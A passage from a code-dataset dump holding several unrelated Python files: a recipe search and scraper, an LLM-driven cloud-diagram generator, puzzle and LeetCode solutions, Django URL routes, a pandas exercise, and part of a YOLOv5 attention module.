keywords.extend(cleanText)\r\n return set(keywords)\r\n\r\n\r\n # search a recipe by ID\r\n def idSearch(self, idRecipe):\r\n soup = self.getCorpusSoup()\r\n recipe = [ balise.text for balise in soup.find_all(\"rec\", attrs={\"id\" : idRecipe}) ]\r\n return recipe\r\n\r\n # get recipe ID\r\n def findById(self, rec):\r\n soup = BeautifulSoup(rec)\r\n idRecipe = soup.find(\"rec\")['id']\r\n return idRecipe\r\n\r\n\r\n def existNb(self, keywords, recipeKeyWords):\r\n return len(set(set(keywords)).intersection(set(recipeKeyWords)))\r\n\r\n\r\n def compare(self, keywords, recipeKeyWords):\r\n nbWords = self.existNb(keywords, recipeKeyWords)\r\n lenRecipeKeyWords = len(set(recipeKeyWords))\r\n prop = round(float((nbWords / lenRecipeKeyWords) * 100), 2)\r\n if prop == 0:\r\n return -2, prop \r\n elif prop < 30:\r\n return -1, prop\r\n elif prop >= 30 and prop < 60: \r\n return 0, prop\r\n else:\r\n return 1, prop\r\n\r\n\r\n # non desirable 
ingredient\r\n def getNonDesirable(self, choice):\r\n if self.lang == 1:\r\n notBio = ['acide'] #à compléter\r\n notVegan = ['viandes', 'poisson', 'poulet', 'escalope', 'canard', 'chèvre', 'œuf', 'graisse'] #à compélter\r\n diab = ['sucres', 'miel', 'tarte', 'pâtisserie'] #à compélter\r\n noCrustace = ['homard', 'langoustes', 'tourteaux', 'crabes', 'araignée', 'écrevisse', 'étrille' 'crevettes','fruits de mer', 'moules', 'huîtres', 'oursin', 'saumon'] #à compélter\r\n noGlutin = ['blé', 'seigle','orge','avoine', 'blé','épeautre','engrain', 'farine', 'semoule', 'boulgour', 'amidon', 'muesli', 'pâtes'] #à compélter\r\n noArachides = ['arachide', 'arachin', 'cacahuète', 'conarachin', 'mandelonas', 'noix'] #à compélter\r\n noLait = ['lait', 'fromage', 'beurre', 'yaourts', 'kéfir', 'viili', 'bifidus', 'caséine', 'babeurre', 'crème'] #à compélter\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet', 'jambon', 'alcool', 'bière', 'rhum', 'vodka', 'whisky', 'tequila', 'Gin', 'cognac', 'pastis', 'lardon', 'champagne']#à compléter\r\n\r\n else:\r\n notBio = ['acide'] #à compélter\r\n notVegan = ['viandes', 'poisson', 'poulet']#à compélter\r\n diab = ['sucres', 'miel'] #à compélter\r\n noCrustace = [''] #à compélter\r\n noGlutin = [''] #à compélter\r\n noArachides = [''] #à compélter\r\n noLait = [''] #à compélter\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet']#à compléter\r\n\r\n nonDesirable = []\r\n if 1 in choice: \r\n nonDesirable.extend(notBio)\r\n if 2 in choice:\r\n nonDesirable.extend(notVegan)\r\n if 3 in choice:\r\n nonDesirable.extend(diab)\r\n if 4 in choice:\r\n nonDesirable.extend(noCrustace)\r\n if 5 in choice:\r\n nonDesirable.extend(noGlutin)\r\n if 6 in choice:\r\n nonDesirable.extend(noArachides)\r\n if 7 in choice:\r\n nonDesirable.extend(noLait)\r\n nonDesirable.extend(haram)\r\n return self.getStemmedText(nonDesirable)\r\n\r\n\r\n def getBySet(self):\r\n frInverse = open('corpusFr/frInverse.txt', 'r')\r\n queryKeywords = ['croustill', 'beignet']\r\n for Qkeyword in queryKeywords: \r\n for line in frInverse.readlines():\r\n lineSplited = line.split(',')\r\n keyword = lineSplited[0]\r\n if Qkeyword == keyword:\r\n print(lineSplited[1:])\r\n print(Qkeyword)\r\n\r\n\r\n #lang=1 french / lang=2 arabe\r\n def getResult(self, queryKeywords, lang):\r\n lang = self.lang\r\n corpusKeyWords = open('corpusFr/frInverse.txt', 'r') if lang == 1 else open('corpusAr/arKeyWords.txt', 'r')\r\n content = corpusKeyWords.readlines()\r\n content = [w[:-1] for w in content]\r\n idRecipes = {}\r\n recipesList = []\r\n for line in content:\r\n lineContent = line.split(',')\r\n keyWord = lineContent[0]\r\n if keyWord in queryKeywords:\r\n recipesList.append(lineContent[1:len(lineContent)])\r\n idRecipes = set(recipesList[0])\r\n for wordList in recipesList:\r\n idRecipes.intersection(set(wordList))\r\n return idRecipes\r\n\r\n\r\n # transform my XML page to Beautifull soup object\r\n def getCorpusSoupById(self, idRecipe):\r\n if idRecipe >= 1 and idRecipe < 1000 :\r\n corpus = 'corpusFr/frCorpus1.txt'\r\n elif idRecipe >= 1000 and idRecipe < 2000 :\r\n corpus = 'corpusFr/frCorpus2.txt'\r\n elif idRecipe >= 2000 and idRecipe < 3000 :\r\n corpus = 'corpusFr/frCorpus3.txt'\r\n elif idRecipe >= 3000 and idRecipe < 4000 :\r\n corpus = 'corpusFr/frCorpus4.txt'\r\n elif idRecipe >= 4000 and idRecipe < 5000 :\r\n corpus = 'corpusFr/frCorpus5.txt'\r\n elif idRecipe >= 5000 and idRecipe < 6000 :\r\n corpus = 'corpusFr/frCorpus6.txt'\r\n elif idRecipe >= 6000 and idRecipe < 7000 :\r\n corpus = 
'corpusFr/frCorpus7.txt'\r\n elif idRecipe >= 7000 and idRecipe < 8000 :\r\n corpus = 'corpusFr/frCorpus8.txt'\r\n elif idRecipe >= 8000 and idRecipe < 9000 :\r\n corpus = 'corpusFr/frCorpus78.txt'\r\n elif idRecipe >= 9000 and idRecipe < 10000 :\r\n corpus = 'corpusFr/frCorpus9.txt'\r\n elif idRecipe >= 10000 and idRecipe < 11000 :\r\n corpus = 'corpusFr/frCorpus10.txt'\r\n elif idRecipe >= 11000 and idRecipe < 12000 :\r\n corpus = 'corpusFr/frCorpus11.txt'\r\n elif idRecipe >= 12000 and idRecipe < 13000 :\r\n corpus = 'corpusFr/frCorpus12.txt'\r\n elif idRecipe >= 13000 and idRecipe < 14000 :\r\n corpus = 'corpusFr/frCorpus13.txt'\r\n elif idRecipe >= 14000 and idRecipe < 15000 :\r\n corpus = 'corpusFr/frCorpus14.txt'\r\n elif idRecipe >= 15000 and idRecipe < 16000 :\r\n corpus = 'corpusFr/frCorpus15.txt'\r\n elif idRecipe >= 16000 and idRecipe < 17000 :\r\n corpus = 'corpusFr/frCorpus16.txt'\r\n elif idRecipe >= 17000 and idRecipe < 18000 :\r\n corpus = 'corpusFr/frCorpus17.txt'\r\n elif idRecipe >= 18000 and idRecipe < 18440 :\r\n corpus = 'corpusFr/frCorpus18.txt'\r\n else:\r\n corpus = 'corpusFr/newCorpus.txt'\r\n file = open(corpus, 'r')\r\n content = file.read()\r\n return BeautifulSoup(content,\"lxml\")\r\n\r\n\r\n # search a recipe by ID specific data\r\n def idSearchRecipeData(self, idRecipe, checked):\r\n soup = self.getCorpusSoupById(int(idRecipe))\r\n title, cat, ing, prep, eng, inf = [], [], [], [], [], []\r\n deniedList = self.getNonDesirable(checked)\r\n for div in soup.find_all(\"rec\", attrs={\"id\" : str(idRecipe)}):\r\n\r\n check = False\r\n i = 0\r\n while not check and i < len(deniedList) :\r\n if deniedList[i] in div.text:\r\n check = True\r\n i += 1\r\n\r\n if not check:\r\n for d in div.find_all('title'):\r\n title.append(d.text)\r\n for d in div.find_all('cat'):\r\n cat.append(d.text)\r\n for d in div.find_all('ing'):\r\n ing.append(d.text)\r\n for d in div.find_all('prep'):\r\n prep.append(d.text)\r\n for d in div.find_all('eng'):\r\n eng.append(d.text)\r\n for d in div.find_all('inf'):\r\n inf.append(d.text)\r\n return title, cat, ing, prep, eng, inf\r\n\r\n\r\n def updateCorpus(self, url):\r\n\r\n from urllib.request import urlopen\r\n from urllib.parse import quote\r\n import re\r\n from string import punctuation\r\n\r\n page = urlopen(url).read().decode('utf-8')\r\n soup = BeautifulSoup(page,'html.parser')\r\n\r\n lastIdToSave = open('corpusFr/lastIdToSave.txt', 'r')\r\n lastID = lastIdToSave.read()\r\n lastIdToSave.close()\r\n\r\n newCorpus = open('corpusFr/newCorpus.txt', 'a')\r\n\r\n urls, i = [], int(lastID)+1\r\n for a in soup.find_all('a', attrs={\"class\", \"recipe-card\"}):\r\n urls.append(str('http://www.marmiton.org'+a['href']))\r\n print(urls)\r\n for url in urls[:5]:\r\n page = urlopen(url).read().decode('utf-8')\r\n soup = BeautifulSoup(page,'html.parser')\r\n\r\n titles = [ title.text for title in soup.find_all(\"h1\", attrs={\"class\" : \"main-title\"}) ]\r\n\r\n ingredients = [ qt.text+ing.text for (qt,ing) in zip(soup.find_all(\"span\", attrs={\"class\" : \"recipe-ingredient-qt\"}), soup.find_all(\"span\", attrs={\"class\" : \"ingredient\"})) ]\r\n\r\n preparations = [ prep.text.split('\\t\\t\\t')[1].split('.')[0] for prep in soup.find_all(\"li\", attrs={\"class\" : \"recipe-preparation__list__item\"}) ]\r\n preparations = re.sub('\\t', ' ', '. 
'.join(preparations))\r\n\r\n timePrep = \"\"\r\n for divpTime in soup.find_all(\"div\", attrs={\"class\" : \"recipe-infos__timmings__preparation\"}):\r\n for pTime in divpTime.find_all(\"span\", attrs={\"class\" : \"recipe-infos__timmings__value\"}):\r\n timePrep = pTime.text.strip() \r\n\r\n cookPrep = \"\"\r\n for divpTime in soup.find_all(\"div\", attrs={\"class\" : \"recipe-infos__timmings__cooking\"}):\r\n for pTime in divpTime.find_all(\"span\", attrs={\"class\" : \"recipe-infos__timmings__value\"}):\r\n cookPrep = pTime.text.strip()\r\n\r\n info = \"Auteur : www.marmiton.org \\nNiveau : \\nPréparation : \"+timePrep+\" \\nCuisson :\"+cookPrep+\"\"\r\n\r\n categories = []\r\n for tagsCat in soup.find_all(\"ul\", attrs={\"class\" : \"mrtn-tags-list\"}):\r\n for tag in tagsCat.find_all(\"li\", attrs={\"class\" : \"mrtn-tag\"}):\r\n categories.append(tag.text)\r\n\r\n #Remove punctuation\r\n titles = [''+''.join(c for c in s if c not in punctuation)+'' for s in titles]\r\n categories = [''+''.join(c for c in s if c not in punctuation)+'' for s in categories]\r\n ingredients = [''+''.join(c for c in s if c not in punctuation)+'' for s in ingredients]\r\n preparations = ''+preparations+''\r\n calories = '0'\r\n\r\n #Convert to String\r\n strTitles = \"\\n\".join(titles)\r\n strTitles = \" \".join(strTitles.split())\r\n strCategories = \"\\n\".join(categories)\r\n strCategories = \" \".join(strCategories.split())\r\n strIngredients = \"\\n\".join(ingredients)\r\n\r\n #String to write in my Corpus\r\n toWrite = '\\n'+strTitles+'\\n'+info+'\\n'+strCategories+'\\n'+strIngredients+'\\n'+preparations+'\\n'+calories+'\\n\\n'\r\n newCorpus.write(toWrite)\r\n\r\n i += 1\r\n lastIdToSave = open('corpusFr/lastIdToSave.txt', 'w')\r\n lastIdToSave.write(str(i-1))\r\n lastIdToSave.close()\r\n\r\nif __name__ == \"__main__\":\r\n searchObj = Search([], 'corpus/arCorpus.txt', 2)\r\n words = ['ﺔﻧﻭﺮﻜﻌﻤﻟا' ,'ﺎﺑﺎﻄﺒﻟا' ,'ﻞﺼﺒﻟا' ,'ﻞﻔﻠﻔﻟا']\r\n stemmed = searchObj.getStemmedText(words)\r\n query = [\"ﻖﺘﺴﻔﻟاﻭ\" ,\"ﺓﺕﻻﻮﻛﻮﺷﻝا\" ,\"ﻉﺏﺎﺻا\"]\r\n keyWords = searchObj.getKeyWords(query)\r\n print(keyWords)\r\n","repo_name":"saidziani/AssistantChef","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":16701,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"71428510167","text":"from diagrams import Cluster, Diagram, Edge\nfrom diagrams.aws.compute import EC2, ECS, EKS, Lambda\nfrom diagrams.aws.database import RDS, ElastiCache, Redshift\nfrom diagrams.aws.integration import SQS\nfrom diagrams.aws.network import VPC, ELB, Route53\nfrom diagrams.aws.storage import S3\nimport random\nimport json\nimport openai\n\n# from dotenv import load_dotenv\n# import os\n\n# load_dotenv()\n# openai.api_key = os.getenv(\"OPENAPI_KEY\")\n\n\nclass ER_GPT:\n def __init__(self):\n self.temperature = 0\n pass\n\n # Step 1, get the architecture components\n def step_1(self, user_input):\n it_prompt = \"I want you to act as an IT Cloud Architect with an experience in reference diagrams that can help introduce new tools.\"\n assistant_prompt = \"Include cloud services, SAP App Server, and Database as nodes. 
Include Private subnet, Virtual Private Cloud as a containers.\"\n # user_input = \"Build an SAP architecture on AWS with multi-cloud deployment for redundancy and vendor flexibility.\"\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": it_prompt},\n {\"role\": \"user\", \"content\": assistant_prompt},\n {\"role\": \"user\", \"content\": user_input},\n ],\n functions=[\n {\n \"name\": \"get_architecture_components\",\n \"description\": \"Get the cloud architecture components split into containers (categorization) and nodes or application services\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"containers\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Region or VPC or private subnet\",\n },\n \"description\": \"Top-layer category of nodes such as region / VPC / private subnet, but not the nodes themselves\",\n },\n \"nodes\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Database or application.\",\n },\n \"description\": \"Application nodes or cloud service. If duplicated in multiple containers, include as that many nodes.\",\n },\n },\n \"required\": [\"nodes\"],\n },\n }\n ],\n function_call={\"name\": \"get_architecture_components\"},\n temperature=self.temperature,\n )\n architecture_result = completion.choices[0].message.function_call.arguments\n print(architecture_result)\n return architecture_result\n\n # Step 2, get the step by step diagram\n def step_2(self, architecture_result):\n diagram_system_prompt = \"Act as a teacher for creating an instruction for drawing an entity diagram based on the cloud software architectural decision. Use nodes for rectangles and clusters for containers.\"\n diagram_assistant_prompt = \"Nodes stay inside of containers. Nodes connect to other nodes. 
Containers cannot connect to other containers.\"\n diagram_input = (\n architecture_result\n + \"\\nBased on the components of this cloud architecture, create an instruction for drawing an accurate entity diagram.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": diagram_system_prompt},\n {\"role\": \"assistant\", \"content\": diagram_assistant_prompt},\n {\"role\": \"user\", \"content\": diagram_input},\n ],\n functions=[\n {\n \"name\": \"get_diagram_instruction\",\n \"description\": \"Get the instruction for drawing an entity diagram based on the cloud software architectural decision\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"instructions\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Current step for drawing an entity diagram\",\n },\n \"description\": \"Instruction for drawing an entity diagram\",\n }\n },\n },\n \"required\": [\"instructions\"],\n }\n ],\n function_call={\"name\": \"get_diagram_instruction\"},\n temperature=self.temperature,\n )\n diagram_result = completion.choices[0].message.function_call.arguments\n print(diagram_result)\n return diagram_result\n\n # Step 3, get the code\n def step_3(self, diagram_result):\n code_imports = \"Cluster, Diagram, Edge, EC2, ECS, EKS, Lambda, RDS, ElastiCache, Redshift, SQS, ELB, Route53, S3\"\n example_code = 'with Diagram(\"diagram\", show=False):\\n with Cluster(\"ReplicaSet\"): \\n pods = [Pod(\"pod{}\".format(i)) for i in range(1, 3)]\\n rs = ReplicaSet(\"rs\")\\n rs - pods\\n dp = Deployment(\"dp\")\\n dp << rs\\n hpa = HPA(\"hpa\")\\n dp << hpa\\n net >> rs << dp'\n code_import = \"\"\"from diagrams.aws.compute import EC2, ECS, EKS, Lambda\\n\n from diagrams.aws.database import RDS, ElastiCache, Redshift\n from diagrams.aws.integration import SQS\n from diagrams.aws.network import VPC, ELB, Route53\n from diagrams.aws.storage import S3\"\"\"\n # from diagrams import Cluster, Diagram, Edge\n code_system_prompt = f\"Act as a developer coding diagrams in Python. Containers are instantiated with With statement. Example code {example_code}. Replace containers with Cluster class. For nodes, use the following import: {code_import}.\"\n code_prompt = (\n diagram_result\n + \"\\nFollow the instruction step by step and write a python code that generates a diagram using diagrams library. Save the image as diagram and show=True. Don't label connections. Don't inlcude } at the end. Don't import anything.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": code_system_prompt},\n {\"role\": \"user\", \"content\": code_prompt},\n ],\n functions=[\n {\n \"name\": \"get_python_code_for_diagram\",\n \"description\": \"Get the python code for drawing an entity diagram without from diagrams import X. Do not draw lines from cluster to another cluster. 
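All three steps of this record use the legacy pre-1.0 openai SDK (openai.ChatCompletion.create with functions=/function_call=). On openai>=1.0 the same forced function call is expressed through tools/tool_choice; a rough equivalent of one request, with the prompt text abbreviated rather than the author's exact strings:

from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment
resp = client.chat.completions.create(
    model="gpt-3.5-turbo",
    messages=[{"role": "user", "content": "Write diagrams code for this plan."}],
    tools=[{"type": "function", "function": {
        "name": "get_python_code_for_diagram",
        "parameters": {"type": "object",
                       "properties": {"code": {"type": "string"}},
                       "required": ["code"]},
    }}],
    tool_choice={"type": "function",
                 "function": {"name": "get_python_code_for_diagram"}},
)
arguments = resp.choices[0].message.tool_calls[0].function.arguments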
It does not have any import statement.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"code\": {\n \"type\": \"string\",\n }\n },\n },\n \"required\": [\"code\"],\n }\n ],\n function_call={\"name\": \"get_python_code_for_diagram\"},\n temperature=self.temperature,\n )\n code_result = completion.choices[0].message.function_call.arguments\n code_result = json.loads(code_result, strict=False)[\"code\"]\n code_result = self.remove_import_statements(self.replace_Node(code_result))\n\n print(code_result)\n self.run_code(code_result)\n return code_result\n\n # step 4 edit the diagram\n def step_4(self, user_edit_input, code_result):\n # user_edit_input = \"Include a non-SAP data outside of virtual private cloud.\"\n\n edit_system_prompt = (\n f\"Act as a senior developer and comment with #. Draw containers with Cluster(). Here is the original code: \"\n + code_result\n )\n edit_prompt = (\n user_edit_input\n + \"\\nNow edit the code to fix the diagram so that the user is satisfied with the direction, cluster, node, or edges. If new application or service is mentioned, call the appropriate diagrams class. Make minimum changes and don't delete anything unless told to.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": edit_system_prompt},\n {\"role\": \"user\", \"content\": edit_prompt},\n ],\n functions=[\n {\n \"name\": \"get_python_code_for_diagram\",\n \"description\": \"Get the python code for drawing an entity diagram without from diagrams import X. Do not draw lines from container to another container.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"code\": {\n \"type\": \"string\",\n }\n },\n },\n \"required\": [\"code\"],\n }\n ],\n function_call={\"name\": \"get_python_code_for_diagram\"},\n temperature=self.temperature,\n )\n edit_result = completion.choices[0].message.function_call.arguments\n edit_result = json.loads(edit_result, strict=False)[\"code\"]\n self.run_code(edit_result)\n return edit_result\n\n def run_code(self, code, done=False):\n while True:\n try:\n exec(code)\n break\n except OSError:\n with Diagram(\"diagram\", show=True):\n exec(code)\n except SyntaxError:\n if not done:\n self.run_code(code[:-2], done=True)\n break\n\n def remove_import_statements(self, import_string):\n lines = import_string.split(\"\\n\")\n filtered_lines = [line for line in lines if \"from\" not in line and \"import\" not in line]\n return \"\\n\".join(filtered_lines)\n\n def replace_Node(self, code):\n all_nodes = [\n \"EC2\",\n \"ECS\",\n \"EKS\",\n \"Lambda\",\n \"RDS\",\n \"ElastiCache\",\n \"Redshift\",\n \"SQS\",\n \"ELB\",\n \"Route53\",\n \"S3\",\n ]\n return code.replace(\"Node\", random.choice(all_nodes))\n","repo_name":"KaiMJ/ER-GPT","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"982407417","text":"class Node:\n\n def __init__(self, bit_index, leaf_value):\n self.bit_index = bit_index\n self.count = 1\n \n self.one_count = 0\n self.one_node = None\n \n self.zero_count = 0\n self.zero_node = None\n \n self.leaf_value = None\n if bit_index >= len(leaf_value): # This is a terminal node. 
There are no more bits\n self.leaf_value = leaf_value\n return\n\n # Parse the remaining bits of the value\n child = Node(bit_index + 1, leaf_value)\n if leaf_value[bit_index] == '1':\n self.one_count += 1\n self.one_node = child\n else:\n self.zero_count += 1\n self.zero_node = child\n\n \n def __str__(self):\n if self.leaf_value:\n return \"Leaf node: \" + self.leaf_value\n else:\n return \"Inner node: \" + str(self.count) + \" children. \" + str(self.one_count) + \" ones, \" + str(self.zero_count) + \" zeros.\"\n\n def insert(self, line):\n self.count += 1\n if line[self.bit_index] == '1':\n self.one_count += 1\n if self.one_node is None:\n self.one_node = Node(self.bit_index + 1, line)\n else:\n self.one_node.insert(line)\n else:\n self.zero_count += 1\n if self.zero_node is None:\n self.zero_node = Node(self.bit_index + 1, line)\n else:\n self.zero_node.insert(line)\n \n def oxygen_generator_rating(self):\n if self.leaf_value:\n return ''\n if self.one_count >= self.zero_count:\n return '1' + self.one_node.oxygen_generator_rating()\n else:\n return '0' + self.zero_node.oxygen_generator_rating()\n\n def co2_scrubber_rating(self):\n if self.leaf_value:\n return ''\n if self.zero_count != 0 and self.zero_count <= self.one_count or self.one_count == 0:\n return '0' + self.zero_node.co2_scrubber_rating()\n else:\n return '1' + self.one_node.co2_scrubber_rating()\n\nroot = None\nwith open('input.txt') as input:\n for line in input.readlines():\n line = line.strip()\n if root == None:\n root = Node(0, line)\n else:\n root.insert(line)\nprint(\"Life support rating: \" + str(int(root.oxygen_generator_rating(), 2)*int(root.co2_scrubber_rating(), 2)))\n","repo_name":"kristy234/adventofcode","sub_path":"2021/3.2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9374072241","text":"from django.conf.urls import patterns, url\nfrom django.views.generic.detail import DetailView\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n\nfrom .views import UserRegister, UserEdit, EventAdd, EventEdit, EventSearch, EventDelete, login_or_redirect, \\\n event_attend, user_follow\nfrom .models import Event\n\n# ##FOR TESTING ONLY###\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n# #####################\n\n\nurlpatterns = patterns('',\n url(r'^$', login_or_redirect, name=\"login\"),\n url(r'^logout/$', 'django.contrib.auth.views.logout_then_login', name=\"logout\"),\n url(r'^register/$', UserRegister.as_view(), name=\"register\"),\n url(r'^event/new$', login_required(EventAdd.as_view()), name=\"event-new\"),\n url(r'^event/delete/(?P\\d+)/$', EventDelete.as_view(), name=\"event-delete\"),\n url(r'^event/edit/(?P\\d+)/$', EventEdit.as_view(), name=\"event-edit\"),\n url(r'^event/(?P\\d+)/$', login_required(DetailView.as_view(model=Event,\n template_name='event/detail.html')),\n name=\"event-detail\"),\n url(r'^event/search$', login_required(EventSearch.as_view()), name=\"event-search\"),\n url(r'^user/(?P\\d+)/$', login_required(DetailView.as_view(model=User,\n template_name='website/profile.html')),\n name=\"user-profile\"),\n url(r'^event/attend/$', event_attend, name=\"event-attend\"),\n url(r'^user/follow/$', user_follow, name=\"user-follow\"),\n url(r'^user/edit/$', login_required(UserEdit.as_view()), name=\"user-edit\"),\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) 
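One note on the static() call above: letting Django itself serve MEDIA files is only appropriate while testing. A common guard (an assumption, not something this repo does; settings and static are already imported at the top of this urls.py) is to mount the route only in debug builds:

if settings.DEBUG:  # never serve user uploads through Django in production
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)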
# FOR TESTING ONLY\n\n","repo_name":"mmauricio11235/Event-Scape","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12154730706","text":"# Given a sorted array and a target value, return the index if the target is found. \n# If not, return the index where it would be if it were inserted in order.\n\n# You may assume no duplicates in the array.\n\n# Example 1:\n# Input: [1,3,5,6], 5\n# Output: 2\n\n# Example 2:\n# Input: [1,3,5,6], 2\n# Output: 1\n\n# Example 3:\n# Input: [1,3,5,6], 7\n# Output: 4\n\n# Example 4:\n# Input: [1,3,5,6], 0\n# Output: 0\n\n# My Method:\n# 检查是否在list内,在的话返回索引;否则判断是否小于某个索引的数值大小,是的话则插入该数值前,索引即为该数值的索引;\n# 再检查如果大于最后一个数值了,即该数值不存在,而且list内的数值均小于它,则其索引为最后一个\nclass Solution:\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n if target in nums:\n return(nums.index(target))\n else:\n for i in range(len(nums)):\n if target < nums[i]:\n return i\n if target > nums[-1]:\n return len(nums)\n \n","repo_name":"IsWdZh/Leetcode","sub_path":"Python/Search-Insert-Position.py","file_name":"Search-Insert-Position.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29206740317","text":"CONST_INT_MAX = 105\n\nT = 10\n\nfor test_case in range(T):\n myQueue =[]\n myGraph = [[] for i in range(CONST_INT_MAX)]\n visited = [False for i in range(CONST_INT_MAX)]\n result = 0\n input_length, start = map(int, input().split())\n input_list = list(map(int, input().split()))\n for i in range(input_length//2):\n myGraph[input_list[i*2]].append(input_list[i*2+1])\n \n visited[start] = True\n myQueue.append(start)\n while myQueue:\n cur_length = len(myQueue)\n for i in range(cur_length):\n cur = myQueue.pop(0)\n if i == 0:\n result = cur\n else:\n if result < cur:\n result = cur\n for j in myGraph[cur]:\n if visited[j] == False:\n visited[j] = True\n myQueue.append(j)\n \n print(\"#{0} {1}\".format(test_case+1, result))\n ","repo_name":"humbleYoon/algorithm","sub_path":"SWEA/SWEA_contact.py","file_name":"SWEA_contact.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25268096035","text":"# 8.57: Read weather_newyork.csv into a DataFrame. Use\n# .reindex() to select just the EST, Max TemperatureF and Min\n# TemperatureF columns (with all rows). Use .rename() to\n# rename these columns as 'date', 'max_temp' and 'min_temp'.\n# Now add an additional column 'diff_temp' showing the\n# difference between max and min. 
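For the Search-Insert-Position record above: the posted solution scans linearly, while the standard library gives the same answer in logarithmic time. A small alternative sketch (an addition, not the record's own code):

import bisect

def search_insert(nums, target):
    # bisect_left is exactly the insertion index that keeps nums sorted
    return bisect.bisect_left(nums, target)

assert search_insert([1, 3, 5, 6], 5) == 2
assert search_insert([1, 3, 5, 6], 2) == 1
assert search_insert([1, 3, 5, 6], 7) == 4
assert search_insert([1, 3, 5, 6], 0) == 0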
# Sort the DataFrame by this\n# value, highest to lowest.\n\nimport pandas as pd\n\ndf = pd.read_csv('../weather_newyork.csv')\n\ndfs = df.reindex(['EST', 'Max TemperatureF', 'Min TemperatureF'], axis=1)\n\ndfs = dfs.rename(columns={ 'EST': 'date',\n 'Max TemperatureF': 'max_temp',\n 'Min TemperatureF': 'min_temp' })\n\ndfs['diff_temp'] = dfs['max_temp'] - dfs['min_temp']\n\n# highest difference first\ndfs = dfs.sort_values('diff_temp', ascending=False)\n","repo_name":"rafaelmvargas/advanced-python","sub_path":"session_08_working_files/inclass_exercises/inclass_8.57.py","file_name":"inclass_8.57.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7558413702","text":"# YOLOv5 🚀 by Ultralytics, GPL-3.0 license\n\"\"\"\nCommon modules\n\"\"\"\n\nimport json\nimport math\nimport platform\nfrom re import S\nimport warnings\nfrom copy import copy\nfrom pathlib import Path\nfrom collections import OrderedDict\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport requests\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom PIL import Image\nfrom torch.cuda import amp\nfrom torch.nn import Softmax\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Function\n\nfrom utils.datasets import exif_transpose, letterbox\nfrom utils.general import (LOGGER, check_requirements, check_suffix, colorstr, increment_path, make_divisible,\n non_max_suppression, scale_coords, xywh2xyxy, xyxy2xywh)\nfrom utils.plots import Annotator, colors, save_one_box\nfrom utils.torch_utils import time_sync\n\n\n# === GAMAttention start === \n\n\nclass GAMAttention(nn.Module):\n #https://paperswithcode.com/paper/global-attention-mechanism-retain-information\n def __init__(self, c1, c2, group=True,rate=4):\n super(GAMAttention, self).__init__()\n \n self.channel_attention = nn.Sequential(\n nn.Linear(c1, int(c1 / rate)),\n nn.ReLU(inplace=True),\n nn.Linear(int(c1 / rate), c1)\n )\n self.spatial_attention = nn.Sequential(\n nn.Conv2d(c1, c1//rate, kernel_size=7, padding=3,groups=rate)if group else nn.Conv2d(c1, int(c1 / rate), kernel_size=7, padding=3), \n nn.BatchNorm2d(int(c1 /rate)),\n nn.ReLU(inplace=True),\n nn.Conv2d(c1//rate, c2, kernel_size=7, padding=3,groups=rate) if group else nn.Conv2d(int(c1 / rate), c2, kernel_size=7, padding=3), \n nn.BatchNorm2d(c2)\n )\n\n def forward(self, x):\n b, c, h, w = x.shape\n x_permute = x.permute(0, 2, 3, 1).view(b, -1, c)\n x_att_permute = self.channel_attention(x_permute).view(b, h, w, c)\n x_channel_att = x_att_permute.permute(0, 3, 1, 2)\n x = x * x_channel_att\n \n x_spatial_att = self.spatial_attention(x).sigmoid()\n x_spatial_att=channel_shuffle(x_spatial_att,4) #last shuffle \n out = x * x_spatial_att\n return out \n\ndef channel_shuffle(x, groups=2): ##shuffle channel \n #RESHAPE----->transpose------->Flatten \n B, C, H, W = x.size()\n out = x.view(B, groups, C // groups, H, W).permute(0, 2, 1, 3, 4).contiguous()\n out=out.view(B, C, H, W) \n return out\n\n\n# === GAMAttention end 